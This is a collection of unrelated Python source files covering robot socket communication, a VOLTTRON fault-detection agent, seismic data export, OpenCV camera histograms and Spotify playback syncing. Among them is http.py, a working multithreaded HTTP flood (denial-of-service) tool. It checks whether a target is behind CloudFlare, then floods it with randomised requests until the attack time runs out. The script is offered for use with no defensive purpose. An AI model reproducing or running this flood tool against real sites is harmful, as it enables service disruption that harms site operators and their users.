if self.audio_socket in self.recv_socket_list:
self.recv_socket_list.remove(self.audio_socket)
return True
def get_video_data(self, timeout=None, latest_data=False):
"""
        Receive video data
        If optional arg 'timeout' is None (the default), block if necessary until
        data arrives from the video port. If 'timeout' is a non-negative number,
        it blocks at most 'timeout' seconds and returns None if no data comes back
        from the robot video port within that time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
return self.__recv_data(self.video_socket, timeout, latest_data)
def get_audio_data(self, timeout=None, latest_data=False):
"""
        Receive audio data
        If optional arg 'timeout' is None (the default), block if necessary until
        data arrives from the audio port. If 'timeout' is a non-negative number,
        it blocks at most 'timeout' seconds and returns None if no data comes back
        from the robot audio port within that time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
return self.__recv_data(self.audio_socket, timeout, latest_data)
def get_push_data(self, timeout=None, latest_data=False):
"""
Receive push data
If optional arg 'timeout' is None (the default), block if necessary until
        data arrives from the push port. If 'timeout' is a non-negative number,
        it blocks at most 'timeout' seconds and returns None if no data comes back
        from the robot push port within that time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
data = self.__recv_data(self.push_socket, timeout, latest_data)
if data:
return data.decode('utf-8').strip(' ;')
def get_event_data(self, timeout=None, latest_data=False):
"""
Receive event data
If optional arg 'timeout' is None (the default), block if necessary until
        data arrives from the event port. If 'timeout' is a non-negative number,
        it blocks at most 'timeout' seconds and returns None if no data comes back
        from the robot event port within that time. Otherwise, return the data immediately.
If optional arg 'latest_data' is set to True, it will return the latest
data, instead of the data in queue tail.
"""
        data = self.__recv_data(self.event_socket, timeout, latest_data)
if data:
return data.decode('utf-8').strip(' ;')
def send_msg(self, msg):
"""
Send msg to control port.
"""
if self.is_shutdown:
            self.log.error("Connection invalid. Try robot_connection.open().")
return False, None
try:
self.ctrl_socket.sendall(msg.encode('utf-8'))
except socket.error as e:
self.log.warn("Error at sending '%s': %s" % (msg, e))
return False, None
try:
recv = self.ctrl_socket.recv(4096)
except socket.error as e:
            self.log.error("Error at receiving the response of '%s': %s" % (msg, e))
return False, None
return True, recv.decode('utf-8').strip(' ;')
@retry(n_retries=3)
    def send_cmd(self, cmd):
        """Send a command which does not require a return value.
        Send the S1 a command that does not expect a payload in return,
        i.e. a command for which the robot only replies 'ok' on success,
        such as the 'connect' command.
        Args:
            cmd: (str) the command string
        Returns:
            (succ: (bool) whether the command succeeded; consumed by the retry decorator)
            None
"""
# succ, response = self.send_msg(cmd + ';')
succ, response = self.send_msg(cmd)
if succ:
if response == 'ok':
                self.log.info("'%s' received 'ok'." % cmd)
return True
elif response == '':
self.log.warn("Got null response of '%s'." % cmd)
else:
self.log.warn("Received an error when executing '%s': %s" % (cmd, response))
return False
@retry(n_retries=3)
    def send_query(self, cmd):
        """Send a command which requires a return value.
        Send the S1 a query command (one that expects a return value),
        i.e. any command ending with '?', such as 'robot mode ?'.
        Args:
            cmd: (str) the command string
        Returns:
            (succ: (bool) whether the command succeeded; consumed by the retry decorator)
            response: (str) the response from the S1
"""
succ, response = self.send_msg(cmd)
# succ, response = self.send_msg(cmd + ';')
if succ:
if response == '':
self.log.warn("Got null response of '%s'." % cmd)
else:
self.log.info("'%s' received '%s'." % (cmd, response))
return True, response
return False, None
def __recv_data(self, socket_obj, timeout, latest_data):
if self.is_shutdown:
self.log.error("Connection is already shut down.")
msg = None
if latest_data:
while self.socket_msg_queue[socket_obj].qsize() > 1:
self.socket_msg_queue[socket_obj].get()
try:
msg = self.socket_msg_queue[socket_obj].get(timeout=timeout)
except Exception as e:
return None
else:
return msg
def __socket_recv_task(self):
self.log.info("SocketRecv thread started.")
while not self.is_shutdown and threading.main_thread().is_alive():
rlist, _, _ = select.select(self.recv_socket_list, [], [], 2)
for s in rlist:
msg, addr = s.recvfrom(4096)
if self.socket_msg_queue[s].full():
self.socket_msg_queue[s].get()
self.socket_msg_queue[s].put(msg)
for s in self.recv_socket_list:
try:
s.shutdown(socket.SHUT_RDWR)
except Exception as e:
pass
        self.log.debuginfo('Shut down SocketRecv thread successfully.')
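# A typical session with RobotConnection (a sketch; the command strings are
# placeholders following the plaintext SDK protocol assumed by send_cmd/send_query):
#   robot = RobotConnection()
#   robot.update_robot_ip(robot.get_robot_ip(timeout=10))
#   if robot.open():
#       robot.send_cmd('command')                  # expects 'ok' back
#       ok, mode = robot.send_query('robot mode ?')
#       robot.send_cmd('quit')
#       robot.close()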
|
afddagent.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2013, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
import clock
import logging
import sys
import greenlet
from zmq.utils import jsonapi
from volttron.lite.agent import BaseAgent, PublishMixin, periodic
from volttron.lite.agent import green, utils, matching, sched
from volttron.lite.messaging import headers as headers_mod, topics
#Import all afdd algorithms
import afdd
import datetime
import uuid
#_log = logging.getLogger(__name__)
#logging.basicConfig(level=logging.DEBUG, stream=sys.stderr)
def AFDDAgent(config_path, **kwargs):
config = utils.load_config(config_path)
agent_id = config['agentid']
termination_window = config.get('termination_window', 600)
min_run_window = config.get('min_run_window', 3600 + termination_window)
rtu_path = dict((key, config[key])
for key in ['campus', 'building', 'unit'])
log_filename = config.get('file_name')
day_run_interval = config.get('day_run_interval')
start_hour = config.get('start_hour')
start_minute = config.get('start_minute')
volttron_flag = config.get('volttron_flag')
debug_flag = True
if not debug_flag:
_log = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, stream=sys.stderr,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%m-%d-%y %H:%M:%S')
else:
_log = logging.getLogger(__name__)
logging.basicConfig(level=logging.NOTSET, stream=sys.stderr,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt= '%m-%d-%y %H:%M:%S',
filename=log_filename,
filemode='a+')
fmt_str = '%(asctime)s %(levelname)-8s %(message)s'
formatter = logging.Formatter(fmt_str,datefmt = '%m-%d-%y %H:%M:%S')
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
console.setFormatter(formatter)
logging.getLogger("").addHandler(console)
_log.debug(rtu_path)
class Agent(PublishMixin, BaseAgent):
def __init__(self, **kwargs):
super(Agent, self).__init__(**kwargs)
self.lock_timer = None
self.lock_acquired = False
self.tasklet = None
self.data_queue = green.WaitQueue(self.timer)
self.value_queue = green.WaitQueue(self.timer)
self.last_run_time = None
self.is_running = False
self.remaining_time = None
self.task_id=None
self.retry_schedule = None
self.start = None
self.end = None
def setup(self):
super(Agent, self).setup()
self.scheduled_task()
def startrun(self, algo=None):
if algo is None:
algo = afdd.AFDD(self,config_path).run
self.tasklet = greenlet.greenlet(algo)
self.is_running = True
self.last_run_time = datetime.datetime.now()
self.tasklet.switch()
def scheduled_task(self):
task_id = uuid.uuid4()
self.task_id=str(task_id)
headers = {
'type': 'NEW_SCHEDULE',
'requesterID': agent_id,
'taskID': self.task_id,
'priority': 'LOW_PREEMPT'
}
if datetime.datetime.now().hour > start_hour:
self.start = datetime.datetime.now().replace(hour=start_hour, minute=start_minute)
self.start = self.start + datetime.timedelta(days=1)
self.end = self.start + datetime.timedelta(hours=2,minutes=30)
sched_time = datetime.datetime.now() + datetime.timedelta(days=day_run_interval + 1)
sched_time=sched_time.replace(hour=0,minute=1)
else:
self.start = datetime.datetime.now().replace(hour=start_hour, minute=start_minute)
self.end = self.start + datetime.timedelta(hours=2,minutes=30)
sched_time = datetime.datetime.now() + datetime.timedelta(days=day_run_interval)
self.start = str(self.start)
self.end = str(self.end)
self.task_timer = self.periodic_timer(60, self.publish_json,
topics.ACTUATOR_SCHEDULE_REQUEST(), headers,[["{campus}/{building}/{unit}".format(**rtu_path),self.start,self.end]])
self.next = self.schedule(sched_time, self.scheduled_task)
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id,'type': 'CANCEL_SCHEDULE'})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_RESULT())
def preempt(self):
if self.is_running:
self.cancel_greenlet()
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_ANNOUNCE(**rtu_path))
def on_schedule(self, topic, headers, message, match):
msg = jsonapi.loads(message[0])
now = datetime.datetime.now()
print 'announce received'
self.remaining_time = headers.get('window', 0)
if self.task_id == headers.get('taskID', ''):
if self.remaining_time < termination_window:
if self.is_running:
self.cancel_greenlet()
elif (self.remaining_time > min_run_window and
(self.last_run_time is None or
(now - self.last_run_time) > datetime.timedelta(hours=23, minutes=50))):
self.startrun()
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_RESULT())
def schedule_result(self, topic, headers, message, match):
msg = jsonapi.loads(message[0])
print('response received')
self.task_timer.cancel()
# @matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
# @matching.match_exact(topics._ACTUATOR_SCHEDULE(**rtu_path))
#
# @matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
# @matching.match_exact(topics.ACTUATOR_LOCK_RESULT(**rtu_path))
# def on_lock_result(self, topic, headers, message, match):
# msg = jsonapi.loads(message[0])
# holding_lock = self.lock_acquired
# self.lock_acquired = msg == 'SUCCESS'
# if self.lock_acquired and not holding_lock and not self.is_running:
# self.start()
@matching.match_exact(topics.RTU_VALUE(point='all', **rtu_path))
def on_new_data(self, topic, headers, message, match):
data = jsonapi.loads(message[0])
#Check override status
if int(data["VoltronPBStatus"]) == 1:
if self.is_running:
_log.debug("AFDD is overridden...")
headers = {
'Content-Type': 'text/plain',
'requesterID': agent_id,
}
self.publish(topics.ACTUATOR_SET(point="VoltronFlag", **rtu_path),
headers, str(0.0))
self.cancel_greenlet()
else:
self.data_queue.notify_all(data)
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_glob(topics.ACTUATOR_VALUE(point='*', **rtu_path))
def on_set_result(self, topic, headers, message, match):
self.value_queue.notify_all((match.group(1), True))
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_glob(topics.ACTUATOR_ERROR(point='*', **rtu_path))
def on_set_error(self, topic, headers, message, match):
self.value_queue.notify_all((match.group(1), False))
def cancel_greenlet(self):
#kill all tasks currently in the queue
self.data_queue.kill_all()
self.value_queue.kill_all()
#kill current tasklet
self.tasklet.throw()
self.is_running = False
def sleep(self, timeout):
_log.debug('wait for steady state({})'.format(timeout))
green.sleep(timeout, self.timer)
def get_new_data(self, timeout=None):
_log.debug('get_new_data({})'.format(timeout))
return self.data_queue.wait(timeout)
def command_equip(self, point_name, value, timeout=None):
_log.debug('set_point({}, {}, {})'.format(point_name, value, timeout))
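# Publish the set request, then block on value_queue until on_set_result or on_set_error posts (point_name, success).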
headers = {
'Content-Type': 'text/plain',
'requesterID': agent_id,
}
self.publish(topics.ACTUATOR_SET(point=point_name, **rtu_path),
headers, str(value))
try:
return self.value_queue.wait(timeout)
except green.Timeout:
return True
Agent.__name__ = 'AFDDAgent'
return Agent(**kwargs)
def main(argv=sys.argv):
'''Main method called by the eggsecutable.'''
utils.default_main(AFDDAgent,
description='VOLTTRON Lite™ AFDD agent',
argv=argv)
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
# def setup(self):
# super(Agent, self).setup()
# headers = {
# 'Content-Type': 'text/plain',
# 'requesterID': agent_id,
# }
# self.lock_timer = self.periodic_timer(2, self.publish,
# topics.ACTUATOR_LOCK_ACQUIRE(**rtu_path), headers)
#Testing functions
# def test():
# import threading, time
# from volttron.lite.agent import periodic
#
# def TestAgent(config_path, condition, **kwargs):
# config = utils.load_config(config_path)
# agent_id = config['agentid']
# rtu_path = dict((key, config[key])
# for key in ['campus', 'building', 'unit'])
#
# class Agent(PublishMixin, BaseAgent):
# def __init__(self, **kwargs):
# super(Agent, self).__init__(**kwargs)
#
# def setup(self):
# super(Agent, self).setup()
# self.damper = 0
# with condition:
# condition.notify()
#
# @matching.match_regex(topics.ACTUATOR_LOCK_ACQUIRE() + '(/.*)')
# def on_lock_result(self, topic, headers, message, match):
# _log.debug("Topic: {topic}, {headers}, Message: {message}".format(
# topic=topic, headers=headers, message=message))
# self.publish(topics.ACTUATOR_LOCK_RESULT() + match.group(0),
# headers, jsonapi.dumps('SUCCESS'))
#
# @matching.match_regex(topics.ACTUATOR_SET() + '(/.*/([^/]+))')
# def on_new_data(self, topic, headers, message, match):
# _log.debug("Topic: {topic}, {headers}, Message: {message}".format(
# topic=topic, headers=headers, message=message))
# if match.group(2) == 'Damper':
# self.damper = int(message[0])
# self.publish(topics.ACTUATOR_VALUE() + match.group(0),
# headers, message[0])
#
# # @periodic(5)
# def send_data(self):
# data = {
# 'ReturnAirTemperature': 78,
# 'OutsideAirTemperature': 71,
# 'DischargeAirTemperature': 76,
# 'MixedAirTemperature': 72,
# 'DamperSignal': 0,
# 'CoolCommand1': 0,
# 'CoolCommand2':0,
# 'OutsideAirVirtualPoint': 75-10,
# 'CoolCall1':1,
# 'HeatCommand1':0,
# 'HeatCommand2':0,
# 'SupplyFanSpeed':75,
# 'ReturnAirCO2Stpt': 65,
# 'FanStatus': 1
# }
# self.publish_ex(topics.RTU_VALUE(point='all', **rtu_path),
# {}, ('application/json', jsonapi.dumps(data)))
#
# Agent.__name__ = 'TestAgent'
# return Agent(**kwargs)
#
# #settings.afdd2_seconds_to_steady_state = 3
# #settings.sync_trial_time = 10
# condition = threading.Condition()
# t = threading.Thread(target=utils.default_main, args=(TestAgent, 'test'),
# kwargs={'condition': condition})
# t.daemon = True
# t.start()
# with condition:
# condition.wait()
# main()
|
http.py
|
#!/usr/bin/env python3
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load one random user agent per thread
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep for the selected number of seconds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
streamToSeedFile.py
|
#from verce.processing import *
from scipy.cluster.vq import whiten
import os
import socket
import traceback
import numpy as np
from multiprocessing import Process, Queue, Pipe
class StreamToSeedFile(SeismoPreprocessingActivity):
def writeToFile(self,stream,location):
stream.write(location,format='MSEED',encoding='FLOAT32');
__file = open(location)
return os.path.abspath(__file.name)
def compute(self):
#folder=str(self.streams[0][0]);
#tokenz=folder.split('|')
#folder=tokenz[1];
#tokenz=folder.split(' - ');
#folder=tokenz[0]+" - "+tokenz[1];
self.outputdest=self.outputdest+"%s" % (self.parameters["filedestination"],);
for tr in self.streams[0]:
try:
tr.data=tr.data.filled();
except Exception as err:
tr.data=np.float32(tr.data);
name=str(self.streams[0][0].stats.network) + "." + self.streams[0][0].stats.station + "." + self.streams[0][0].stats.channel
try:
if tr.stats['type']=="velocity":
self.outfile= str(name)+".seedv"
else:
if tr.stats['type']=="acceleration":
self.outfile= str(name)+".seeda"
else:
if tr.stats['type']=="displacement":
self.outfile= str(name)+".seedd"
else:
self.outfile= str(name)+".seed"
except Exception as err:
self.outfile= str(name)+".seed"
#self.outputdest=self.outputdest+"/"+folder
try:
if not os.path.exists(self.outputdest):
os.makedirs(self.outputdest)
except Exception as e:
print "folder exists: "+self.outputdest
self.outputdest=self.outputdest+"/"+self.outfile
#stores the file in a folder created on the date of the first trace
# p = multiprocessing.Process(target=self.writeToFile, args=(self.streams[0],self.outputdest))
path=self.writeToFile(self.streams[0],self.outputdest)
# p.start()
# p.join(10)
self.addOutput(self.streams[0],location="file://"+socket.gethostname()+path,format="application/octet-stream",metadata={'prov:type':'synthetic-waveform'})
return "true"
if __name__ == "__main__":
proc=StreamToSeedFile("StreamToSeedFile Script")
proc.process();
|
cam_processing.py
|
#!/usr/bin/python3
import cv2
import numpy as np
import matplotlib.pyplot as plt
import threading
import retinex
from ubi_test import post_request
print("Versión de OpenCV:",cv2.__version__)
global cap, frame
cap = cv2.VideoCapture(-1)
frame = np.array([])
def quitar_ruido(img):
# Create our sharpening kernel; the sum of all values must equal one for uniformity
kernel_sharpening = np.array([[-1,-1,-1],
[-1, 9,-1],
[-1,-1,-1]])
sharpened_img = cv2.filter2D(img, -1, kernel_sharpening)
return sharpened_img
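# Minimal usage sketch for quitar_ruido (hypothetical file names, not part of the original script):
#   img = cv2.imread('estanque.jpg')
#   cv2.imwrite('estanque_sharp.jpg', quitar_ruido(img))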
def procesar_video():
global cap, frame
while True:
# Capture frame-by-frame
ret, frame = cap.read()
# IMAGE PROCESSING (frame)
imagen_filtrada = quitar_ruido(frame)
# bordes = cv2.Canny(imagen_filtrada, 100,200)
# Display the resulting frame
cv2.imshow('ImagenEstanque', imagen_filtrada)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
def inicializar_hist():
color = 'gray'
bins = 16
resizeWidth = 0
# Initialize plot.
fig, ax = plt.subplots()
if color == 'rgb':
ax.set_title('Histogram (RGB)')
else:
ax.set_title('Histogram (grayscale)')
ax.set_xlabel('Bin')
ax.set_ylabel('Frequency')
# Initialize plot line object(s). Turn on interactive plotting and show plot.
lw = 3
alpha = 0.5
if color == 'rgb':
lineR, = ax.plot(np.arange(bins), np.zeros((bins,)), c='r', lw=lw, alpha=alpha)
lineG, = ax.plot(np.arange(bins), np.zeros((bins,)), c='g', lw=lw, alpha=alpha)
lineB, = ax.plot(np.arange(bins), np.zeros((bins,)), c='b', lw=lw, alpha=alpha)
else:
lineGray, = ax.plot(np.arange(bins), np.zeros((bins,1)), c='k', lw=lw)
ax.set_xlim(0, bins-1)
ax.set_ylim(0, 1)
plt.ion()
plt.show()
# Grab, process, and display video frames. Update plot line object(s).
while True:
(grabbed, frame) = cap.read()
if not grabbed:
break
# Resize frame to width, if specified.
if resizeWidth > 0:
(height, width) = frame.shape[:2]
resizeHeight = int(float(resizeWidth / width) * height)
frame = cv2.resize(frame, (resizeWidth, resizeHeight),
interpolation=cv2.INTER_AREA)
# Normalize histograms based on number of pixels per frame.
numPixels = np.prod(frame.shape[:2])
if color == 'rgb':
cv2.imshow('Imagen Estanque', frame)
(b, g, r) = cv2.split(frame)
histogramR = cv2.calcHist([r], [0], None, [bins], [0, 255]) / numPixels
histogramG = cv2.calcHist([g], [0], None, [bins], [0, 255]) / numPixels
histogramB = cv2.calcHist([b], [0], None, [bins], [0, 255]) / numPixels
lineR.set_ydata(histogramR)
lineG.set_ydata(histogramG)
lineB.set_ydata(histogramB)
else:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('Org', frame)
# RETINEX: uncomment to show how the image looks after applying retinex
# img_amsrcr = retinex.automatedMSRCR(frame,[15, 80, 250])
# cv2.imshow('AMSRCR', img_amsrcr)
histogram = cv2.calcHist([gray], [0], None, [bins], [0, 255]) / numPixels
lineGray.set_ydata(histogram)
# Compute the mean of the histogram
hist_mean = np.mean(histogram)
# Build a dictionary to publish to Ubidots
dict_data = {"histogram_mean": hist_mean}
# This is where it gets published to Ubidots
# post_request(dict_data)
fig.canvas.draw()
# IMAGE PROCESSING (frame)
# bordes = cv2.Canny(frame, 100,200)
# Display the resulting frame
# cv2.imshow('Bordes Imagen', bordes)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
hist_process = threading.Thread(target = inicializar_hist)
hist_process.start()
|
radiosync.py
|
from concurrent import futures
import json as json_lib
import logging
import requests
import threading
import time
import urllib
import urlparse
WINDOW = 5.0
SCHEME = "https"
HOST = "radio-sync.appspot.com"
def log():
return logging.getLogger(__name__)
class AgedStatus(object):
def __init__(self, status, age=None):
self.status = status
self.base_age = age
self.created = time.time()
@property
def age(self):
return time.time() - self.created + (self.base_age or 0)
@property
def pos(self):
return self.get("playing_position")
@property
def track(self):
return self.get("track")
@property
def track_uri(self):
track = self.track
return track["track_resource"]["uri"] if track else None
@property
def track_length(self):
track = self.track
return track.get("length") if track else None
@property
def overtime(self):
if self.track_length is None or self.pos is None:
return 0
return self.pos - self.track_length
@property
def running(self):
return self.get("running")
@property
def playing(self):
return self.get("playing")
@property
def stale(self):
return not self.running or self.overtime > 0
def __getitem__(self, key):
if key not in self.status:
raise KeyError(key)
return self.get(key)
def get(self, key, default=None):
if key not in self.status:
return default
if key == "playing_position":
position = self.status["playing_position"]
if self.get("playing"):
return position + self.age
else:
return position
if key == "server_time":
return self.status["server_time"] + int(self.age)
else:
return self.status.get(key, default)
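# Example of the age extrapolation above (illustrative numbers only): a status captured with
# playing_position == 10.0 while playing reads back as roughly 12.0 when queried two seconds
# later, since get() adds the elapsed age to the stored position.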
class Broadcast(object):
SCHEME = SCHEME
HOST = HOST
PATH = "playerstate"
def __init__(self, id, spotify):
self.id = id
self.spotify = spotify
self.thread = None
self.running = False
def start(self):
if self.running:
return
log().debug("Signaling start.")
self.running = True
self.thread = threading.Thread(
name="Broadcast-%s" % self.id, target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
log().debug("Signaling stop.")
self.running = False
self.thread = None
def run(self):
log().debug("Starting.")
while self.running:
try:
for status in self.spotify.remote_status_shortlong(
returnafter=1800, returnon=self.spotify.EVENTS):
if not self.running:
break
status = json_lib.dumps(status)
url = urlparse.urlunparse((
self.SCHEME, self.HOST, self.PATH, None, None, None))
requests.post(url, data=dict(id=self.id, status=status))
except Exception:
log().exception("While posting update")
log().debug("Stopping.")
class LocalStatusGetter(object):
def __init__(self, spotify, cv, **kwargs):
self.spotify = spotify
self.cv = cv
self.kwargs = kwargs
self.status = None
self.thread = None
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(
name="LocalStatusGetter", target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
def run(self):
log().debug("Starting.")
while self.running:
for status in self.spotify.remote_status_shortlong(**self.kwargs):
status = AgedStatus(status)
log().debug("Got local status.")
with self.cv:
self.status = status
self.cv.notify()
log().debug("Stopping.")
class TargetStatusGetter(object):
PATH = "playerstate"
def __init__(self, cv, target_id, window=None, rapid_poll_interval=None,
target_timeout=None):
self.cv = cv
self.target_id = target_id
self.window = window or 0
self.rapid_poll_interval = rapid_poll_interval or 0
self.target_timeout = target_timeout
self.status = None
self.thread = None
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(
name="TargetStatusGetter", target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
def get_target_status(self):
log().debug("Getting target status.")
query = urllib.urlencode(dict(id=self.target_id))
url = urlparse.urlunparse((
SCHEME, HOST, self.PATH, None, query, None))
json = requests.get(url).json()
if json and json["status"]:
return AgedStatus(json["status"], age=json["age"])
log().debug("No status for target.")
return AgedStatus({"running": False})
def run(self):
log().debug("Starting.")
status = self.get_target_status()
with self.cv:
self.status = status
self.cv.notify()
while self.running:
# Poor man's long-polling. Poll slowly, but speed up around track
# changes, to catch changes with less delay. Hopefully goes away
# when we change out the backend...
with self.cv:
if not self.status.playing:
log().debug("Target not playing.")
wait_time = self.window
elif self.status.overtime > self.target_timeout:
log().debug("Target looks timed out.")
wait_time = self.window
elif self.status.overtime > 0:
log().debug("Target is overtime.")
wait_time = self.rapid_poll_interval
elif self.status.overtime > -self.window:
log().debug("Target coming up on overtime.")
wait_time = (
-self.status.overtime + self.rapid_poll_interval)
else:
wait_time = self.window
log().debug("Waiting %.3fs before polling.", wait_time)
time.sleep(wait_time)
if not self.running:
break
status = self.get_target_status()
with self.cv:
self.status = status
self.cv.notify()
log().debug("Stopping.")
class Follow(object):
SCHEME = SCHEME
HOST = HOST
PATH = "playerstate"
TARGET_TIMEOUT = 10.0
WINDOW = 5.0
RAPID_POLL_INTERVAL = 0.5
def __init__(self, spotify, target_id):
self.spotify = spotify
self.target_id = target_id
self.last_local_status = None
self.local_status = None
self.target_status = None
self.thread = None
self.running = False
def start(self):
log().debug("Signaling start.")
self.running = True
self.thread = threading.Thread(
name="Follow-%s" % self.target_id, target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
log().debug("Signaling stop.")
self.running = False
self.thread = None
def is_synced(self):
"""Decide if we should catch up to the target."""
if bool(self.target_status) != bool(self.local_status):
return False
if not self.local_status:
return True
if self.target_status.running != self.local_status.running:
log().debug(
"Local %srunning, target %srunning",
"" if self.local_status.running else "not ",
"" if self.target_status.running else "not ")
return False
target_playing = (
self.target_status.playing and self.target_status.overtime < 0)
if target_playing != self.local_status.playing:
log().debug(
"Local %splaying, target %splaying",
"" if self.local_status.playing else "not ",
"" if target_playing else "not ")
return False
if not self.local_status.playing:
return True
if self.target_status.track_uri != self.local_status.track_uri:
# We have a next-track for the target, and we just switched tracks
# (probably automatically went to the next track). It's okay to
# switch tracks.
if self.local_status.pos < 0.1:
log().debug("We just switched tracks, catching up.")
return False
# If we're just finishing up a track, let it finish, before
# switching to the target's next track.
delta = (
self.local_status.track_length - self.local_status.pos +
self.target_status.pos)
log().debug("Target on different track, delta = %.3f", delta)
if delta > self.WINDOW:
return False
else:
# Seek to the right position if we're too far off.
delta = self.target_status.pos - self.local_status.pos
log().debug("Delta = %.3f", delta)
if abs(delta) > self.WINDOW:
return False
return True
def try_update_status(self, update_func):
start = time.time()
status = update_func()
elapsed = time.time() - start
log().debug("New status: %s", json_lib.dumps(status))
status = AgedStatus(status, age=elapsed / 2)
if not status.get("error"):
self.last_local_status = None
self.local_status = status
return True
else:
return False
def do_update(self, update_func):
if not self.try_update_status(update_func):
self.try_update_status(lambda: self.spotify.remote_status())
def sync(self):
playing = self.target_status.playing
if self.target_status.overtime > 0:
log().debug("Target is overtime.")
playing = False
if not playing:
modified = self.local_status and self.local_status.playing
if modified:
log().debug("Pausing.")
self.do_update(lambda: self.spotify.remote_pause(True))
return True
else:
log().debug("Continuing to do nothing.")
return False
target_pos = self.target_status.pos
# Smoother transitions.
# TODO: Web Helper connections seem to always take several seconds, we
# often have to seek after a track change. Maybe subtract some time
# here.
if target_pos < self.WINDOW:
target_pos = 0
target_uri = "%s#%d:%.3f" % (
self.target_status.track_uri, int(target_pos / 60),
target_pos % 60)
log().debug("Syncing to %s", target_uri)
